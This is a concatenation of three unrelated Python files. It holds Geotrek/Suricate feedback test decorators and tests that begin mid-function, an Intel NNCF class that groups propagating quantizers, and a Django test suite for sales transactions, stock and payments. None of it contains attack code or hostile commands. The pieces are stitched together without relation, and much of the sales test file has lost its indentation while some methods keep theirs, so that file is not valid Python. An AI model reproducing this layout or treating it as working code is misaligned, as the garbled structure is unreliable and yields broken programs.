                    test_func(self, *args, **kwargs)
            except AssertionError as err:
                err.args += (failure_tag,)
                collected.append(err)
        raise_multiple(collected)
    return inner
def test_for_management_and_workflow_modes(test_func):
    """Decorator: run *test_func* under both the 'Suricate Management' and
    'Suricate Workflow' settings, collecting AssertionErrors and re-raising
    them all at the end via raise_multiple."""
    def inner(self, *args, **kwargs):
        exceptions = []
        try:
            with override_settings(SURICATE_REPORT_ENABLED=True, SURICATE_MANAGEMENT_ENABLED=True, SURICATE_WORKFLOW_ENABLED=False, LANGUAGE_CODE='fr'):
                test_func(self, *args, **kwargs)
        except AssertionError as e:
            e.args += ("Failed for 'Suricate Management' mode",)
            exceptions.append(e)
        try:
            with override_settings(SURICATE_REPORT_ENABLED=True, SURICATE_MANAGEMENT_ENABLED=True, SURICATE_WORKFLOW_ENABLED=True, LANGUAGE_CODE='fr'):
                test_func(self, *args, **kwargs)
        except AssertionError as e:
            e.args += ("Failed for 'Suricate Workflow' mode",)
            # BUG FIX: this append was missing, so a workflow-mode failure
            # was annotated but silently swallowed and never re-raised.
            exceptions.append(e)
        raise_multiple(exceptions)
    return inner
def test_for_workflow_mode(test_func):
    """Decorator: run *test_func* with the full 'Suricate Workflow' settings
    enabled; an AssertionError is tagged with the mode and re-raised."""
    def inner(self, *args, **kwargs):
        workflow_settings = override_settings(
            SURICATE_REPORT_ENABLED=True,
            SURICATE_MANAGEMENT_ENABLED=True,
            SURICATE_WORKFLOW_ENABLED=True,
            LANGUAGE_CODE='fr',
        )
        try:
            with workflow_settings:
                test_func(self, *args, **kwargs)
        except AssertionError as err:
            err.args += ("Failed for 'Suricate Workflow' mode",)
            raise
    return inner
def test_for_management_mode(test_func):
    """Decorator: run *test_func* with 'Suricate Management' settings
    (workflow disabled); an AssertionError is tagged with the mode and
    re-raised."""
    def inner(self, *args, **kwargs):
        management_settings = override_settings(
            SURICATE_REPORT_ENABLED=True,
            SURICATE_MANAGEMENT_ENABLED=True,
            SURICATE_WORKFLOW_ENABLED=False,
            LANGUAGE_CODE='fr',
        )
        try:
            with management_settings:
                test_func(self, *args, **kwargs)
        except AssertionError as err:
            err.args += ("Failed for 'Suricate Management' mode",)
            raise
    return inner
class TestWorkflowFirstSteps(SuricateWorkflowTests):
    """Workflow mode: classifying a report must notify Suricate only when
    SURICATE_WORKFLOW_ENABLED is on."""

    @classmethod
    def setUpTestData(cls):
        SuricateWorkflowTests.setUpTestData()
        cls.report_filed_1 = ReportFactory(status=cls.filed_status, external_uuid=uuid.uuid4(), assigned_user=cls.admin)
        cls.report_filed_2 = ReportFactory(status=cls.filed_status, external_uuid=uuid.uuid4(), assigned_user=cls.admin)

    @override_settings(SURICATE_WORKFLOW_ENABLED=True)
    @mock.patch("geotrek.feedback.helpers.requests.get")
    @mock.patch("geotrek.feedback.helpers.requests.post")
    @mock.patch("geotrek.feedback.helpers.SuricateMessenger.message_sentinel")
    @mock.patch("geotrek.feedback.helpers.SuricateMessenger.update_status")
    def test_classify_alert_notifies_suricate_when_workflow_enabled(self, mocked_notify_suricate_status, mocked_mail_sentinel, mocked_post, mocked_get):
        form = ReportForm(
            instance=self.report_filed_1,
            data={
                'geom': self.report_filed_1.geom,
                'email': self.report_filed_1.email,
                'status': self.classified_status.pk,
                'message_sentinel': "Problème déjà réglé"
            }
        )
        # BUG FIX: was 'assertTrue(form.is_valid)' -- asserting the bound
        # method object (always truthy) instead of running validation.
        self.assertTrue(form.is_valid())
        form.save()
        mocked_mail_sentinel.assert_called_once_with(self.report_filed_1.formatted_external_uuid, "Problème déjà réglé")
        mocked_notify_suricate_status.assert_called_once_with(self.report_filed_1.formatted_external_uuid, self.classified_status.identifier, "Problème déjà réglé")

    @override_settings(SURICATE_WORKFLOW_ENABLED=False)
    @mock.patch("geotrek.feedback.helpers.requests.get")
    @mock.patch("geotrek.feedback.helpers.requests.post")
    @mock.patch("geotrek.feedback.helpers.SuricateMessenger.message_sentinel")
    @mock.patch("geotrek.feedback.helpers.SuricateMessenger.update_status")
    def test_classify_alert_does_not_notify_suricate_when_workflow_disabled(self, mocked_notify_suricate_status, mocked_mail_sentinel, mocked_post, mocked_get):
        form = ReportForm(
            instance=self.report_filed_2,
            data={
                'geom': self.report_filed_2.geom,
                'email': self.report_filed_2.email,
                'status': self.classified_status.pk,
                'message_sentinel': "Problème déjà réglé"
            }
        )
        # BUG FIX: same missing call as above.
        self.assertTrue(form.is_valid())
        form.save()
        mocked_mail_sentinel.assert_not_called()
        mocked_notify_suricate_status.assert_not_called()
|
"""
Copyright (c) 2021 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from copy import copy
from typing import Dict
from typing import Optional
from typing import Set
from nncf.common.quantization.quantizer_propagation.structs import PropagatingQuantizer
class UnifiedScalePropagatingQuantizerGroupManager:
    """
    Maintains disjoint groups of propagating quantizers whose quantization scales
    must be unified (shared) in the final quantized model.
    """

    def __init__(self):
        self._next_gid = 0  # monotonically increasing source of group IDs
        self._group_vs_prop_quants_dict = {}  # type: Dict[int, Set[PropagatingQuantizer]]

    def _get_next_gid(self) -> int:
        # Hand out sequential IDs starting from 0.
        gid = self._next_gid
        self._next_gid += 1
        return gid

    def register_group(self, prop_quants: Set[PropagatingQuantizer]) -> int:
        """
        Registers a set of propagating quantizers as a new group.

        :param prop_quants: A set of propagating quantizers to be registered.
        :return: The ID of the newly created group.
        """
        # Invariant: a quantizer belongs to at most one group at a time.
        for existing_gid, existing_group in self._group_vs_prop_quants_dict.items():
            for pq in prop_quants:
                assert pq not in existing_group, \
                    'Propagating quantizer #{} is already registered in a group {}!'.format(pq.id, existing_gid)
        new_gid = self._get_next_gid()
        self._group_vs_prop_quants_dict[new_gid] = prop_quants
        return new_gid

    def add_to_group(self, target_gid: int, prop_quant: PropagatingQuantizer):
        """
        Adds a propagating quantizer to an already existing group.

        :param target_gid: The ID of the group to be extended.
        :param prop_quant: The propagating quantizer to be registered in the group. The quantizer
          must not be already registered in any group.
        """
        for other_gid, other_group in self._group_vs_prop_quants_dict.items():
            if other_gid == target_gid:
                continue  # it is fine if the quantizer is already in the target group
            assert prop_quant not in other_group, 'Tried to add propagating quantizer #{} to group #{}, ' \
                                                  'but it is already registered in a group {}!'.format(prop_quant.id,
                                                                                                       target_gid,
                                                                                                       other_gid)
        self._group_vs_prop_quants_dict[target_gid].add(prop_quant)

    def remove_from_group(self, group: int, prop_quant: PropagatingQuantizer):
        """
        Removes a propagating quantizer from a group.

        :param group: The ID of the group from where a quantizer should be removed.
        :param prop_quant: The propagating quantizer to be removed from the group.
        """
        self._group_vs_prop_quants_dict[group].remove(prop_quant)

    def get_group_vs_prop_quants_dict(self) -> Dict[int, Set[PropagatingQuantizer]]:
        """
        :return: A shallow copy of the group-ID-to-quantizer-set mapping.
        """
        return copy(self._group_vs_prop_quants_dict)

    def get_group_id_by_propagating_quantizer_id(self, requested_pqid: int) -> Optional[int]:
        """
        Looks up the group containing the propagating quantizer with a given ID.

        :param requested_pqid: The ID of the propagating quantizer to search for among groups.
        :return: The group ID of the quantizer, if found, otherwise None.
        """
        for gid, group in self._group_vs_prop_quants_dict.items():
            if any(pq.id == requested_pqid for pq in group):
                return gid
        return None

    def merge_groups(self, merge_to_gid: int, merge_from_gid: int):
        """
        Merges two groups into a single one. The `merge_to_gid` group retains its group ID.

        :param merge_to_gid: The ID of the group to merge into.
        :param merge_from_gid: The ID of the group to merge into the group defined by `merge_to_gid`
        """
        if merge_to_gid == merge_from_gid:
            return  # merging a group into itself is a no-op
        absorbed = self._group_vs_prop_quants_dict.pop(merge_from_gid)
        self._group_vs_prop_quants_dict[merge_to_gid].update(absorbed)
class QuantizersWaitingForMergeManager:
    """
    Bookkeeping for propagating quantizers that are parked on a downward-branching node
    of the quantizer propagation state graph until their merge is resolved.
    """

    def __init__(self):
        # Node key -> set of quantizers currently waiting on that node.
        self._branching_node_keys_vs_quantizers_waiting_for_merge = {}  # type: Dict[str, Set[PropagatingQuantizer]]
        # Reverse mapping: quantizer -> node key it waits upon.
        self._quantizers_vs_branching_node_keys = {}  # type: Dict[PropagatingQuantizer, str]

    def add_propagating_quantizer_to_wait_on_node_key(self, pq: PropagatingQuantizer, branching_node_key: str):
        """
        Registers a propagating quantizer as "waiting" on a node in QuantizerPropagationStateGraph.

        :param pq: The propagating quantizer to be registered as "waiting".
        :param branching_node_key: The node key in QuantizerPropagationStateGraph to be waited upon, most likely
          the downward-branching node.
        """
        waiting_set = self._branching_node_keys_vs_quantizers_waiting_for_merge.setdefault(branching_node_key, set())
        waiting_set.add(pq)
        self._quantizers_vs_branching_node_keys[pq] = branching_node_key

    def get_blocking_node(self, pq: PropagatingQuantizer) -> str:
        """
        Returns the node key upon which the propagating quantizer is registered to be "waiting".

        :param pq: The propagating quantizer that has already been registered to be "waiting" on a node.
        :return: The node key in QuantizerPropagationStateGraph that the `pq` is registered to be waiting upon.
        """
        return self._quantizers_vs_branching_node_keys[pq]

    def get_waiting_quantizers_for_branching_node_key(self, node_key: str) -> Set[PropagatingQuantizer]:
        """
        Returns the set of all quantizers registered to be "waiting" on a given node key in
        QuantizerPropagationStateGraph.

        :param node_key: The node key in QuantizerPropagationStateGraph
        :return: The set of propagating quantizers registered as "waiting" on `node_key`.
        """
        return self._branching_node_keys_vs_quantizers_waiting_for_merge[node_key]

    def __contains__(self, item: PropagatingQuantizer):
        # Membership means "this quantizer is currently waiting somewhere".
        return item in self._quantizers_vs_branching_node_keys

    def resolve_merged_node(self, branching_node_key: str):
        """
        De-registers any quantizers that were previously registered to be "waiting" on a given node key.

        :param branching_node_key: The node key in QuantizerPropagationStateGraph that some propagating
          quantizers have previously been registered upon.
        """
        released = self._branching_node_keys_vs_quantizers_waiting_for_merge.pop(branching_node_key)
        for waiting_pq in released:
            self._quantizers_vs_branching_node_keys.pop(waiting_pq)
|
from decimal import Decimal
from django.test import TestCase
from swipe.settings import USED_CURRENCY
from article.models import ArticleType, OtherCostType
from article.tests import INeedSettings
from crm.models import User, Person
from logistics.models import SupplierOrder, StockWish
from money.models import Currency, Cost, Money, VAT, Price, AccountingGroup, CurrencyData
from order.models import Order, OrderLine
from register.models import PaymentType, Register, RegisterMaster, RegisterCount
from sales import models
from sales.models import SalesTransactionLine, Payment, Transaction, NotEnoughStockError, \
OtherCostTransactionLine, OtherTransactionLine, TransactionLine, PaymentMisMatchError, NotEnoughOrderLinesError, \
PaymentTypeError, RefundTransactionLine, RefundError, InvalidDataException, StockCollections, PriceOverride
from stock.models import Stock, StockChangeSet
from stock.stocklabel import OrderLabel
from supplication.models import PackingDocument
from supplier.models import Supplier, ArticleTypeSupplier
from tools.testing import TestData
# noinspection PyUnusedLocal,PyUnusedLocal,PyUnusedLocal,PyUnusedLocal,PyUnusedLocal
class TestTransactionCreationFunction(TestCase, TestData):
def setUp(self):
self.setup_base_data()
self.vat_group = self.vat_group_high
self.price = Price(amount=Decimal("1.00"), use_system_currency=True)
self.currency = Currency(iso=USED_CURRENCY)
self.acc_group = self.accounting_group_components
self.article_type = self.articletype_1
self.at2 = self.articletype_2
self.at3 = ArticleType(accounting_group=self.acc_group, name="Foo3")
self.at3.save()
cost = Cost(amount=Decimal(1), use_system_currency=True)
self.supplier = self.supplier_1
ats = self.articletypesupplier_article_1
ats2 = self.articletypesupplier_article_2
self.money = Money(amount=Decimal(3.32), currency=self.currency)
self.customer = self.customer_person_1
self.copro = self.user_1
self.pt = PaymentType.objects.create(name="Bla")
self.pt2 = PaymentType.objects.create(name="Baz")
self.pt3 = PaymentType.objects.create(name="Quux")
self.cost = Cost(currency=Currency(USED_CURRENCY), amount=Decimal(1.23))
self.cost2 = Cost(currency=Currency(USED_CURRENCY), amount=Decimal(1.24))
self.simplest = SalesTransactionLine(article=self.article_type, count=1, cost=self.cost,
price=self.price, num=1)
self.simple_payment_usd = Payment(amount=self.money, payment_type=self.pt)
self.simple_payment_eur = Payment(amount=Money(amount=Decimal(2.0), currency=Currency(USED_CURRENCY)),
payment_type=self.pt)
self.other_cost = OtherCostType(name="Oth1", accounting_group=self.acc_group,
fixed_price=self.price
)
self.other_cost.save()
self.currency_data_eur = CurrencyData(iso="EUR", name="Euro", symbol="€", digits=2)
self.currency_data_eur.save()
self.register = Register(currency=self.currency_data_eur, name="Foo", is_cash_register=False, is_active=True,
payment_type=self.pt)
self.register.save()
self.register2 = Register(currency=self.currency_data_eur, name="Bar", is_cash_register=False, is_active=True,
payment_type=self.pt2)
self.register2.save()
self.register.open(counted_amount=Decimal(0))
self.register2.open(counted_amount=Decimal(0))
def test_not_enough_stock_error(self):
oalist = [SalesTransactionLine(price=self.price, count=1, order=None, article=self.article_type)]
with self.assertRaises(NotEnoughStockError):
Transaction.create_transaction(user=self.copro, payments=[self.simple_payment_usd],
transaction_lines=oalist)
    def test_not_enough_parameters(self):
        """Each transaction-line type must reject construction data missing a mandatory field.

        NOTE(review): s1/s3/s7 expect InvalidDataException while s2/s4/s5/s6 expect
        IncorrectDataException -- presumably "missing" vs "inconsistent" data;
        confirm the distinction against sales.models.
        """
        s1 = SalesTransactionLine(count=2, price=self.price)  # no article
        s2 = SalesTransactionLine(count=2, article=self.article_type)  # no price
        s3 = OtherCostTransactionLine(count=1, price=self.price)  # no other_cost_type
        s4 = OtherCostTransactionLine(count=2, other_cost_type=self.other_cost)  # no price
        s5 = OtherTransactionLine(count=2, price=self.price)  # no text
        s6 = OtherTransactionLine(count=1, text="Bla")  # no price
        # has text and price yet still rejected -- presumably missing accounting_group; confirm
        s7 = OtherTransactionLine(count=3, text="Bla", price=self.price)
        with self.assertRaises(models.InvalidDataException):
            Transaction.create_transaction(user=self.copro, payments=[self.simple_payment_usd],
                                           transaction_lines=[s1])
        with self.assertRaises(models.IncorrectDataException):
            Transaction.create_transaction(user=self.copro, payments=[self.simple_payment_usd],
                                           transaction_lines=[s2])
        with self.assertRaises(models.InvalidDataException):
            Transaction.create_transaction(user=self.copro, payments=[self.simple_payment_usd],
                                           transaction_lines=[s3])
        with self.assertRaises(models.IncorrectDataException):
            Transaction.create_transaction(user=self.copro, payments=[self.simple_payment_usd],
                                           transaction_lines=[s4])
        with self.assertRaises(models.IncorrectDataException):
            Transaction.create_transaction(user=self.copro, payments=[self.simple_payment_usd],
                                           transaction_lines=[s5])
        with self.assertRaises(models.IncorrectDataException):
            Transaction.create_transaction(user=self.copro, payments=[self.simple_payment_usd],
                                           transaction_lines=[s6])
        with self.assertRaises(models.InvalidDataException):
            Transaction.create_transaction(user=self.copro, payments=[self.simple_payment_usd],
                                           transaction_lines=[s7])
    def test_sales_transaction_line_wrong_customer_stock(self):
        """A sales line without an order reference must not be able to consume the
        stock that was received for a customer order: NotEnoughStockError expected.
        """
        AMOUNT_1 = 6
        AMOUNT_2 = 10
        # Order -> supplier order -> packing document: stock arrives labeled for the order.
        Order.create_order_from_wishables_combinations(self.copro, self.customer,
                                                       [[self.article_type, AMOUNT_1, self.price],
                                                        [self.at2, AMOUNT_2, self.price]])
        SupplierOrder.create_supplier_order(self.copro, self.supplier,
                                            articles_ordered=[[self.article_type, AMOUNT_1, self.cost],
                                                              [self.at2, AMOUNT_2, self.cost]])
        PackingDocument.create_packing_document(user=self.copro, supplier=self.supplier,
                                                article_type_cost_combinations=[[self.article_type, AMOUNT_1],
                                                                                [self.at2, AMOUNT_2]],
                                                packing_document_name="Foo")
        # NOTE(review): no order= kwarg here, unlike the happy-path variant --
        # presumably this targets unlabeled stock, which is empty; confirm.
        stl = SalesTransactionLine(price=Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True,
                                               vat=1.23),
                                   count=2, article=self.article_type)
        with self.assertRaises(NotEnoughStockError):
            Transaction.create_transaction(user=self.copro, payments=[self.simple_payment_eur], transaction_lines=[stl])
def test_sales_transaction_line(self):
AMOUNT_1 = 6
AMOUNT_2 = 10
order = Order.create_order_from_wishables_combinations(self.copro, self.customer,
[[self.article_type, AMOUNT_1, self.price],
[self.at2, AMOUNT_2, self.price]])
SupplierOrder.create_supplier_order(self.copro, self.supplier,
articles_ordered=[[self.article_type, AMOUNT_1, self.cost],
[self.at2, AMOUNT_2, self.cost]])
PackingDocument.create_packing_document(user=self.copro, supplier=self.supplier,
article_type_cost_combinations=[[self.article_type, AMOUNT_1],
[self.at2, AMOUNT_2]],
packing_document_name="Foo")
count = 2
stl = SalesTransactionLine(price=Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True,
vat=1.23),
count=count, article=self.article_type, order=order.id)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * count, currency=Currency(USED_CURRENCY))
local_payment = Payment(amount=loc_money, payment_type=self.pt)
Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[stl])
tls = TransactionLine.objects.all()
self.assertEquals(len(tls), 1)
obj = tls[0]
self.assertEquals(obj.num, self.article_type.id)
self.assertEquals(obj.count, 2)
self.assertFalse(obj.isRefunded)
self.assertEquals(obj.order, order.id)
self.assertEquals(obj.text, str(self.article_type))
st = Stock.objects.get(labeltype="Order", labelkey=order.id, article=self.article_type)
self.assertEquals(st.count, AMOUNT_1 - count)
ols_1 = OrderLine.objects.filter(wishable__sellabletype=self.article_type, state='S')
ols_2 = OrderLine.objects.filter(wishable__sellabletype=self.article_type, state='A')
ols = OrderLine.objects.filter(wishable__sellabletype=self.article_type)
self.assertEquals(len(ols_1), count)
self.assertEquals(len(ols_2), AMOUNT_1 - count)
def test_sales_stock_level(self):
AMOUNT_STOCK_1 = 5
StockWish.create_stock_wish(user_modified=self.copro, articles_ordered=[(self.article_type, AMOUNT_STOCK_1)])
SupplierOrder.create_supplier_order(supplier=self.supplier,
articles_ordered=[[self.article_type, AMOUNT_STOCK_1, self.cost]],
user_modified=self.copro)
PackingDocument.create_packing_document(user=self.copro, supplier=self.supplier,
article_type_cost_combinations=[[self.article_type, AMOUNT_STOCK_1]],
packing_document_name="Foo")
count = 3
stl = SalesTransactionLine(
price=Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True, vat=1.23),
count=count, article=self.article_type, order=None)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * count, currency=Currency(USED_CURRENCY))
local_payment = Payment(amount=loc_money, payment_type=self.pt)
Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[stl])
st = Stock.objects.get(labeltype__isnull=True, article=self.article_type)
self.assertEquals(st.count, AMOUNT_STOCK_1 - count)
def test_sales_all_stock_levels(self):
AMOUNT_STOCK_1 = 5
AMOUNT_ORDER = 4
order= Order.create_order_from_wishables_combinations(user=self.copro, customer=self.customer,
wishable_type_number_price_combinations=[[self.article_type,
AMOUNT_ORDER,
self.price]])
StockWish.create_stock_wish(user_modified=self.copro, articles_ordered=[(self.article_type, AMOUNT_STOCK_1)])
SupplierOrder.create_supplier_order(supplier=self.supplier,
articles_ordered=[[self.article_type, AMOUNT_STOCK_1 + AMOUNT_ORDER,
self.cost]],
user_modified=self.copro)
PackingDocument.create_packing_document(user=self.copro, supplier=self.supplier,
article_type_cost_combinations=[[self.article_type,
AMOUNT_STOCK_1 + AMOUNT_ORDER]],
packing_document_name="Foo")
count_stock = 3
count_order = 2
stl = SalesTransactionLine(
price=Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True, vat=1.23),
count=count_stock, article=self.article_type, order=None)
stl2 = SalesTransactionLine(
price=Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True, vat=1.23),
count=count_order, article=self.article_type, order=order.id)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * (count_stock + count_order),
currency=Currency(USED_CURRENCY))
local_payment = Payment(amount=loc_money, payment_type=self.pt)
Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[stl, stl2])
st = Stock.objects.get(labeltype__isnull=True, article=self.article_type)
self.assertEquals(st.count, AMOUNT_STOCK_1 - count_stock)
st2 = Stock.objects.get(labeltype="Order", labelkey=order.id, article=self.article_type)
self.assertEquals(st2.count, AMOUNT_ORDER - count_order)
    def test_sales_transaction_not_enough_stock(self):
        """Selling one unit more than the order-labeled stock holds must raise NotEnoughStockError."""
        AMOUNT_1 = 6
        AMOUNT_2 = 10
        order = Order.create_order_from_wishables_combinations(self.copro, self.customer,
                                                               [[self.article_type, AMOUNT_1, self.price],
                                                                [self.at2, AMOUNT_2, self.price]])
        SupplierOrder.create_supplier_order(self.copro, self.supplier,
                                            articles_ordered=[[self.article_type, AMOUNT_1, self.cost],
                                                              [self.at2, AMOUNT_2, self.cost]])
        PackingDocument.create_packing_document(user=self.copro, supplier=self.supplier,
                                                article_type_cost_combinations=[[self.article_type, AMOUNT_1],
                                                                                [self.at2, AMOUNT_2]],
                                                packing_document_name="Foo")
        count = AMOUNT_1 + 1  # exactly one unit over the available order-labeled stock
        stl = SalesTransactionLine(price=Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True,
                                               vat=1.23),
                                   count=count, article=self.article_type, order=order.id)
        loc_money = Money(amount=self.simple_payment_eur.amount.amount * count, currency=Currency(USED_CURRENCY))
        local_payment = Payment(amount=loc_money, payment_type=self.pt)
        with self.assertRaises(NotEnoughStockError):
            Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[stl])
    def test_sales_transaction_just_enough_stock(self):
        """Boundary case: selling exactly all order-labeled stock must succeed (no exception)."""
        AMOUNT_1 = 6
        AMOUNT_2 = 10
        order = Order.create_order_from_wishables_combinations(self.copro, self.customer,
                                                               [[self.article_type, AMOUNT_1, self.price],
                                                                [self.at2, AMOUNT_2, self.price]])
        SupplierOrder.create_supplier_order(self.copro, self.supplier,
                                            articles_ordered=[[self.article_type, AMOUNT_1, self.cost],
                                                              [self.at2, AMOUNT_2, self.cost]])
        PackingDocument.create_packing_document(user=self.copro, supplier=self.supplier,
                                                article_type_cost_combinations=[[self.article_type, AMOUNT_1],
                                                                                [self.at2, AMOUNT_2]],
                                                packing_document_name="Foo")
        count = AMOUNT_1  # consume the entire order-labeled stock
        stl = SalesTransactionLine(price=Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True,
                                               vat=1.23),
                                   count=count, article=self.article_type, order=order.id)
        loc_money = Money(amount=self.simple_payment_eur.amount.amount * count, currency=Currency(USED_CURRENCY))
        local_payment = Payment(amount=loc_money, payment_type=self.pt)
        Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[stl])
def test_sales_transaction_too_much_payment(self):
AMOUNT_1 = 6
AMOUNT_2 = 10
order = Order.create_order_from_wishables_combinations(self.copro, self.customer,
[[self.article_type, AMOUNT_1, self.price],
[self.at2, AMOUNT_2, self.price]])
SupplierOrder.create_supplier_order(self.copro, self.supplier,
articles_ordered=[[self.article_type, AMOUNT_1, self.cost],
[self.at2, AMOUNT_2, self.cost]])
PackingDocument.create_packing_document(user=self.copro, supplier=self.supplier,
article_type_cost_combinations=[[self.article_type, AMOUNT_1],
[self.at2, AMOUNT_2]],
packing_document_name="Foo")
count = AMOUNT_1
stl = SalesTransactionLine(price=Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True,
vat=1.23),
count=count, article=self.article_type, order=order.id)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * count + Decimal(0.001),
currency=Currency(USED_CURRENCY))
local_payment = Payment(amount=loc_money, payment_type=self.pt)
with self.assertRaises(PaymentMisMatchError):
Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[stl])
def test_sales_transaction_too_little_payment(self):
AMOUNT_1 = 6
AMOUNT_2 = 10
order = Order.create_order_from_wishables_combinations(self.copro, self.customer,
[[self.article_type, AMOUNT_1, self.price],
[self.at2, AMOUNT_2, self.price]])
SupplierOrder.create_supplier_order(self.copro, self.supplier,
articles_ordered=[[self.article_type, AMOUNT_1, self.cost],
[self.at2, AMOUNT_2, self.cost]])
PackingDocument.create_packing_document(user=self.copro, supplier=self.supplier,
article_type_cost_combinations=[[self.article_type, AMOUNT_1],
[self.at2, AMOUNT_2]],
packing_document_name="Foo")
count = AMOUNT_1
stl = SalesTransactionLine(price=Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True,
vat=1.23),
count=count, article=self.article_type, order=order.id)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * count - Decimal(0.001),
currency=Currency(USED_CURRENCY))
local_payment = Payment(amount=loc_money, payment_type=self.pt)
with self.assertRaises(PaymentMisMatchError):
Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[stl])
def test_sales_transaction_other_cost(self):
AMOUNT_1 = 6
AMOUNT_2 = 10
AMOUNT_3 = 5
order = Order.create_order_from_wishables_combinations(self.copro, self.customer,
[[self.article_type, AMOUNT_1, self.price],
[self.at2, AMOUNT_2, self.price], [self.other_cost, AMOUNT_3,
self.price]])
SupplierOrder.create_supplier_order(self.copro, self.supplier,
articles_ordered=[[self.article_type, AMOUNT_1, self.cost],
[self.at2, AMOUNT_2, self.cost]])
PackingDocument.create_packing_document(user=self.copro, supplier=self.supplier,
article_type_cost_combinations=[[self.article_type, AMOUNT_1],
[self.at2, AMOUNT_2]],
packing_document_name="Foo")
count = AMOUNT_3 - 1
octt = OtherCostTransactionLine(price=Price(amount=self.simple_payment_eur.amount.amount,
use_system_currency=True, vat=1.23),
count=count, other_cost_type=self.other_cost, order=order.id)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * count, currency=Currency(USED_CURRENCY))
local_payment = Payment(amount=loc_money, payment_type=self.pt)
Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[octt])
tls = TransactionLine.objects.all()
self.assertEquals(len(tls), 1)
octls = OtherCostTransactionLine.objects.all()
self.assertEquals(len(octls), 1)
octl = octls[0]
self.assertFalse(octl.isRefunded)
self.assertEquals(octl.count, count)
self.assertEquals(octl.order, order.id)
self.assertEquals(octl.text, octl.other_cost_type.name)
sold_counter = 0
ols = OrderLine.objects.filter(wishable__sellabletype=self.other_cost, order_id=order.id)
for ol in ols:
if ol.state == 'S':
sold_counter += 1
self.assertEquals(sold_counter, count)
def test_sales_transaction_other_cost_just_enough_orderlines(self):
AMOUNT_1 = 6
AMOUNT_2 = 10
AMOUNT_3 = 5
order = Order.create_order_from_wishables_combinations(self.copro, self.customer,
[[self.article_type, AMOUNT_1, self.price],
[self.at2, AMOUNT_2, self.price], [self.other_cost, AMOUNT_3,
self.price]])
SupplierOrder.create_supplier_order(self.copro, self.supplier,
articles_ordered=[[self.article_type, AMOUNT_1, self.cost],
[self.at2, AMOUNT_2, self.cost]])
PackingDocument.create_packing_document(user=self.copro, supplier=self.supplier,
article_type_cost_combinations=[[self.article_type, AMOUNT_1],
[self.at2, AMOUNT_2]],
packing_document_name="Foo")
count = AMOUNT_3
octt = OtherCostTransactionLine(price=Price(amount=self.simple_payment_eur.amount.amount,
use_system_currency=True, vat=1.23),
count=count, other_cost_type=self.other_cost, order=order.id)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * count, currency=Currency(USED_CURRENCY))
local_payment = Payment(amount=loc_money, payment_type=self.pt)
Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[octt])
tls = TransactionLine.objects.all()
self.assertEquals(len(tls), 1)
octls = OtherCostTransactionLine.objects.all()
self.assertEquals(len(octls), 1)
octl = octls[0]
self.assertFalse(octl.isRefunded)
self.assertEquals(octl.count, count)
self.assertEquals(octl.order, order.id)
self.assertEquals(octl.text, octl.other_cost_type.name)
sold_counter = 0
ols = OrderLine.objects.filter(wishable__sellabletype=self.other_cost, order_id=order.id)
for ol in ols:
if ol.state == 'S':
sold_counter += 1
self.assertEquals(sold_counter, count)
    def test_sales_transaction_other_cost_not_enough_orderlines(self):
        """Selling one more 'other cost' unit than was ordered must raise NotEnoughOrderLinesError."""
        AMOUNT_1 = 6
        AMOUNT_2 = 10
        AMOUNT_3 = 5
        order = Order.create_order_from_wishables_combinations(self.copro, self.customer,
                                                               [[self.article_type, AMOUNT_1, self.price],
                                                                [self.at2, AMOUNT_2, self.price], [self.other_cost, AMOUNT_3,
                                                                                                   self.price]])
        SupplierOrder.create_supplier_order(self.copro, self.supplier,
                                            articles_ordered=[[self.article_type, AMOUNT_1, self.cost],
                                                              [self.at2, AMOUNT_2, self.cost]])
        PackingDocument.create_packing_document(user=self.copro, supplier=self.supplier,
                                                article_type_cost_combinations=[[self.article_type, AMOUNT_1],
                                                                                [self.at2, AMOUNT_2]],
                                                packing_document_name="Foo")
        count = AMOUNT_3 + 1  # exactly one unit over the ordered amount
        octt = OtherCostTransactionLine(price=Price(amount=self.simple_payment_eur.amount.amount,
                                                    use_system_currency=True, vat=1.23),
                                        count=count, other_cost_type=self.other_cost, order=order.id)
        loc_money = Money(amount=self.simple_payment_eur.amount.amount * count, currency=Currency(USED_CURRENCY))
        local_payment = Payment(amount=loc_money, payment_type=self.pt)
        with self.assertRaises(NotEnoughOrderLinesError):
            Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[octt])
def test_sales_transaction_other_line(self):
AMOUNT_1 = 6
AMOUNT_2 = 10
AMOUNT_3 = 5
Order.create_order_from_wishables_combinations(self.copro, self.customer,
[[self.article_type, AMOUNT_1, self.price],
[self.at2, AMOUNT_2, self.price], [self.other_cost, AMOUNT_3,
self.price]])
SupplierOrder.create_supplier_order(self.copro, self.supplier,
articles_ordered=[[self.article_type, AMOUNT_1, self.cost],
[self.at2, AMOUNT_2, self.cost]])
PackingDocument.create_packing_document(user=self.copro, supplier=self.supplier,
